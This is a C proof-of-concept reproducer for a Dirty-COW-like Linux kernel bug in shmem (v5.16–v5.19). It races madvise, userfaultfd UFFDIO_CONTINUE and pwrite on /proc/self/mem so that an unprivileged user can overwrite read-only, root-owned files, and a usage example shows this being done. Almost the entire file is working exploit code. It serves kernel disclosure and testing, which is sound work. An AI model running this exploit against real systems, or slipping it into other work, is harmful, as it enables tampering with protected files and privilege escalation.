/*
 * This is a reproducer for a new privilege escalation issue, similar to
 * Dirty COW (CVE-2016-5195), introduced by accident into the Linux kernel via:
 *   9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte")
 * Part of Linux v5.16 -- v5.19.
 *
 * In contrast to Dirty COW, it's limited to shmem only. It uses a combination
 * of userfaultfd UFFDIO_CONTINUE and madvise(MADV_DONTNEED) to trick
 * the kernel into not breaking COW, instead allowing a shmem page to be
 * modified without write permissions.
 *
 * Example:
 *   $ sudo -s
 *   # rm /tmp/foo
 *   # echo "Shared data" > /tmp/foo
 *   # chmod 0404 /tmp/foo
 *   # exit
 *   $ ls -l /tmp/foo
 *   -r-----r-- 1 root root 12 26. Jul 10:26 /tmp/foo
 *   $ cat /tmp/foo
 *   Shared data
 *   $ gcc -pthread reproducer.c -o reproducer
 *   $ ./reproducer /tmp/foo
 *   Old content:
 *   Shared data
 *
 *   New content:
 *   10:27:53ata
 *   $ cat /tmp/foo
 *   10:27:53ata
 *
 * To reproduce faster, it might help to load the system, for example,
 * using:
 *   $ stress -c `nproc --all`
 * Or running it inside a VM.
 *
 * Details:
 * We want the following sequence to trigger. Assuming the shared page is
 * mapped R/O already (e.g., due to previous action from Thread 1):
 *   Thread 2: pwrite() [start]
 *     -> Trigger write fault, replace mapped page by anonymous page
 *     -> COW was broken, remember FOLL_COW
 *   Thread 1: madvise(map, 4096, MADV_DONTNEED);
 *     -> Discard anonymous page
 *   Thread 1: tmp += *((int *)map);
 *     -> Trigger a minor uffd fault
 *   Thread 3: ioctl(uffd, UFFDIO_CONTINUE, ...)
 *     -> Resolve minor uffd fault via UFFDIO_CONTINUE
 *     -> Map shared page R/O but set it dirty
 *   Thread 2: pwrite() [continue]
 *     -> Find R/O mapped page that's dirty and FOLL_COW being set
 *     -> Modify shared page R/O because we don't break COW (again)
 *
 * Dirty COW (CVE-2016-5195) was originally identified by Phil Oester.
 *
 * Thanks to Nadav Amit for pointing out that the pte_dirty() check in
 * FOLL_FORCE code is problematic and might be exploitable.
 *
 * Copyright (C) 2022 Red Hat, Inc.
* Author(s): David Hildenbrand */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include int mem_fd; void *map; volatile int tmp; int uffd; char str[80]; void *discard_thread_fn(void *arg) { int ret; while (1) { /* * Zap that page first, such that we can trigger a new * minor fault. */ ret = madvise(map, 4096, MADV_DONTNEED); if (ret < 0) { fprintf(stderr, "madvise() failed: %d\n", errno); exit(1); } /* * Touch the page to trigger a UFFD minor fault. The uffd * thread will resolve the minor fault via a UFFDIO_CONTINUE. */ tmp += *((int *)map); } } void *write_thread_fn(void *arg) { while (1) /* * Ignore any errors -- errors means that pwrite() would * have to trigger a uffd fault and sleep, which the GUP * variant doesn't support, so it fails with an I/O errror. * * Once we retry and are lucky to already find the placed * page via UFFDIO_CONTINUE (from the other threads), we get * no error. */ pwrite(mem_fd, str, strlen(str), (uintptr_t) map); } static void *uffd_thread_fn(void *arg) { static struct uffd_msg msg; /* Data read from userfaultfd */ struct uffdio_continue uffdio; struct uffdio_range uffdio_wake; ssize_t nread; while (1) { struct pollfd pollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); if (nready == -1) { fprintf(stderr, "poll() failed: %d\n", errno); exit(1); } nread = read(uffd, &msg, sizeof(msg)); if (nread <= 0) continue; uffdio.range.start = (unsigned long) map; uffdio.range.len = 4096; uffdio.mode = 0; if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) { if (errno == EEXIST) { uffdio_wake.start = (unsigned long) map; uffdio_wake.len = 4096; if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) { } } else { fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno); } } } } static int setup_uffd(void) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK | 
UFFD_USER_MODE_ONLY); if (uffd < 0) { fprintf(stderr, "syscall() failed: %d\n", errno); return -errno; } uffdio_api.api = UFFD_API; uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM; if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) { fprintf(stderr, "UFFDIO_API failed: %d\n", errno); return -errno; } if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) { fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n"); return -ENOSYS; } uffdio_register.range.start = (unsigned long) map; uffdio_register.range.len = 4096; uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) { fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno); return -errno; } return 0; } static void print_content(int fd) { ssize_t ret; char buf[80]; int offs = 0; while (1) { ret = pread(fd, buf, sizeof(buf) - 1, offs); if (ret > 0) { buf[ret] = 0; printf("%s", buf); offs += ret; } else if (!ret) { break; } else { fprintf(stderr, "pread() failed: %d\n", errno); } } printf("\n"); } int main(int argc, char *argv[]) { pthread_t thread1, thread2, thread3; struct tm *time_info; time_t current_time; char tmp[80]; int fd; if (argc < 2) { const char *shared_str = "Shared data"; printf("Testing with sealed memfd\n"); fd = memfd_create("test", MFD_ALLOW_SEALING); if (fd < 0) { fprintf(stderr, "memfd_create() failed: %d\n", errno); return 1; } if (ftruncate(fd, strlen(shared_str))) { fprintf(stderr, "ftruncate() failed: %d\n", errno); return 1; } if (pwrite(fd, shared_str, strlen(shared_str), 0) != strlen(shared_str)) { fprintf(stderr, "pwrite() failed: %d\n", errno); return 1; } if (fcntl(fd, F_ADD_SEALS, F_SEAL_GROW | F_SEAL_SHRINK | F_SEAL_WRITE | F_SEAL_SEAL) < 0) { fprintf(stderr, "fcntl() failed: %d\n", errno); return 1; } } else if (argc == 2) { fd = open(argv[1], O_RDONLY); if (fd < 0) { fprintf(stderr, "open() failed: %d\n", errno); return 1; } } else { fprintf(stderr, "usage: %s target_file\n", argv[0]); return 1; } mem_fd = open("/proc/self/mem", O_RDWR); if 
(mem_fd < 0) { fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno); return 1; } map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd ,0); if (map == MAP_FAILED) { fprintf(stderr, "mmap() failed: %d\n", errno); return 1; } if (setup_uffd()) return 1; /* Prepare the string we'll want to store. */ time(¤t_time); time_info = localtime(¤t_time); strftime(str, sizeof(str), "%H:%M:%S", time_info); printf("Old content: \n"); print_content(fd); pthread_create(&thread1, NULL, discard_thread_fn, NULL); pthread_create(&thread2, NULL, write_thread_fn, NULL); pthread_create(&thread3, NULL, uffd_thread_fn, NULL); /* Loop until we succeeded with our modification. */ while (1) { ssize_t ret = pread(fd, tmp, strlen(str), 0); if (ret > 0) { tmp[ret] = 0; if (!strcmp(tmp, str)) break; } } printf("New content: \n"); print_content(fd); return 0; }